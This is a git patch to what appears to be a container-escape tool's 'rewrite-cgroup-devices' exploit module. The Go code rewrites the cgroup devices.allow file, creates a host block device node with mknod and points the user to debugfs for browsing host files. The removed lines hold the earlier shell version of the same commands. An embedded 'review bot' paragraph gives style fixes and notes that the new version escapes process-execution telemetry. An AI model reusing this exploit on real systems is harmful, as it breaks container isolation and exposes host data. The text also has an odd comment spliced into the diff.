From e1a31ad5a3204d9b861d08115948b1845a7f77f8 Mon Sep 17 00:00:00 2001
From: neargle
Date: Fri, 29 Jan 2021 08:39:27 +0800
Subject: [PATCH] update rewrite and mknod function more elegant by yeahx
---
 pkg/exploit/rewrite_cgroup_devices.go | 57 ++++++++++++---------------
 1 file changed, 26 insertions(+), 31 deletions(-)
diff --git a/pkg/exploit/rewrite_cgroup_devices.go b/pkg/exploit/rewrite_cgroup_devices.go
index 3b72627..ca06df2 100644
--- a/pkg/exploit/rewrite_cgroup_devices.go
+++ b/pkg/exploit/rewrite_cgroup_devices.go
@@ -8,8 +8,6 @@ import (
 "log"
 "os"
 "path/filepath"
- "regexp"
- "strings"
 "syscall"
 )
@@ -31,13 +29,6 @@ func fileInode(path string) (inodeID uint64, err error) {
 return 0, nil
 }
-func generateCreateMknodCmd(allowPath string, deviceID string) (string) {
- shell := CreateMknodCmd
- shell = strings.Replace(shell, "${DevicesAllowPath}", allowPath, -1)
- shell = strings.Replace(shell, "${DeviceID}", deviceID, -1)
- return shell
-}
-
 // runShellFile run shell script use bash
 func runShellFile(filePreString string, shell string) error {
@@ -99,31 +90,42 @@ func (p cgroupDevicesExploitS) Run() bool {
 log.Printf("find cgroup devices.allow file: %s\n", devicesAllowPath)
 // get "virtblk" device ID
- data, err := ioutil.ReadFile(procDeviceConfig)
+ mountInfos, err := util.GetMountInfo()
 if err != nil {
- log.Printf("err found while open %s: %v\n", procDeviceConfig, err)
- return false
- }
- r := regexp.MustCompile(`(\d+) virtblk`)
- ret := r.FindStringSubmatch(string(data))
- if len(ret) < 2 {
+ log.Printf("get mount info error: %v", err)
 return false
 }
- did := ret[1]
- log.Printf("get virtblk device ID: %s\n", did)
 // rewrite and mknod
- shell := generateCreateMknodCmd(devicesAllowPath, did)
- err = runShellFile("device-mknod", shell)
+ err = util.SetBlockAccessible(devicesAllowPath)
 if err != nil {
- log.Printf("run /tmp/device-mknod-* error: %s\n", err)
+ log.Printf("set block accessible err %v", err)
 return false
 }
- // escape done~
- log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.")
+ // use lxcfs_rw exp function by https://github.com/yeahx
+ for _, mi := range mountInfos {
+ if util.FindTargetDeviceID(&mi) {
+
+ dev := util.MakeDev(mi.Marjor, mi.Minor)
+ if dev == 0 {
+ log.Printf("Blockdevice Marjor/Minor number invalid.")
+ return false
+ }
+
+ err = syscall.Mknod("./cdk_mknod_result", syscall.S_IFBLK|uint32(os.FileMode(0700)), dev)
+ if err != nil {
+ log.Printf("mknod err: %v", err)
+ return false
+ } else {
+ // escape done~
+ log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.")
+ return true
+ }
+ }
+ }
- return true
+ return false
 }
 // MountCgroupCmd remount a write-able devices cgroup subsystem
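Review bot: In the new `for _, mi := range mountInfos` loop, the `else` after `return false` is redundant and `&mi` takes the address of the range variable, which linters flag on Go versions before 1.22; iterating by index (`for i := range mountInfos { mi := &mountInfos[i]`) and letting the success path follow the error check without the `else` reads more cleanly. `log.Printf("Blockdevice Marjor/Minor number invalid.")` has no format verbs, so `log.Println` fits better, and `uint32(os.FileMode(0700))` can be the plain constant `0700`. Because the node is now created in-process with `syscall.Mknod` instead of through the removed `device-mknod` shell script, a comment such as `// creates ./cdk_mknod_result via mknod(2) directly; no shell or mknod binary is spawned` would make clear to readers, including defenders writing detections, that process-execution telemetry no longer covers this step and that mknod syscall auditing and the devices.allow change that `util.SetBlockAccessible` presumably makes are the signals left. Run's body starts outside the hunk.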
@@ -132,13 +134,6 @@ mount -oremount,rw /sys/fs/cgroup
 mkdir /sys/fs/cgroup/cgneartest
 mount -t cgroup -o devices devices /sys/fs/cgroup/cgneartest`
-var CreateMknodCmd = `set -uex
-echo a > ${DevicesAllowPath}
-sleep 2
-mknod cdk_mknod_result b ${DeviceID} 1`
-
-var procDeviceConfig = `/proc/devices`
-
 func init() {
 exploit := cgroupDevicesExploitS{}
 plugin.RegisterExploit("rewrite-cgroup-devices", exploit)